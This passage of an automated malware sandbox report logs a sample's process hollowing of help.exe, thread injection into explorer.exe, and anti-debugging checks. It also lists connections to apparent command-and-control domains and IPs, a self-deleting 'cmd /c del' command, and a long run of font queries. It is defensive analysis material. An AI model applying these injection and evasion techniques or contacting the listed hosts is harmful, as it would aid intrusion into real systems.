Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DDD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DDD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 142.111.76.118 80
Source: C:\Windows\explorer.exe; Network Connect: 15.165.26.252 80
Source: C:\Windows\explorer.exe; Network Connect: 172.67.130.43 80
Source: C:\Windows\explorer.exe; Network Connect: 81.17.18.198 80
Source: C:\Windows\explorer.exe; Domain query: www.appearwood.club
Source: C:\Windows\explorer.exe; Domain query: www.warungjitu.com
Source: C:\Windows\explorer.exe; Network Connect: 3.13.255.157 80
Source: C:\Windows\explorer.exe; Domain query: www.theartsutra.com
Source: C:\Windows\explorer.exe; Domain query: www.chestfreezersale.xyz
Source: C:\Windows\explorer.exe; Network Connect: 104.21.7.67 80
Source: C:\Windows\explorer.exe; Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe; Domain query: www.betbonusuk.com
Source: C:\Windows\explorer.exe; Domain query: www.rosewoodcibubur.com
Source: C:\Windows\explorer.exe; Domain query: www.omxpro.com
Source: C:\Windows\explorer.exe; Domain query: www.moretuantired.com
Source: C:\Windows\explorer.exe; Domain query: www.peridot.website
Source: C:\Windows\explorer.exe; Domain query: www.weluvweb.com
Source: C:\Windows\explorer.exe; Domain query: www.okitmall.com
Source: C:\Windows\explorer.exe; Network Connect: 52.206.71.220 80
Source: C:\Windows\explorer.exe; Domain query: www.emmajanetracy.com
Source: C:\Windows\explorer.exe; Network Connect: 52.56.126.26 80
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Memory written: C:\Users\user\Desktop\s6G3ZtvHZg.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\help.exe; Thread register set: target process: 3292
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Section unmapped: C:\Windows\SysWOW64\help.exe base address: BF0000
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Process created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Process created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
Source: C:\Windows\SysWOW64\help.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmp; Binary or memory string: uProgram Manager
Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmp; Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.505741956.0000000000EB8000.00000004.00000020.sdmp; Binary or memory string: ProgmanX
Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Users\user\Desktop\s6G3ZtvHZg.exe VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
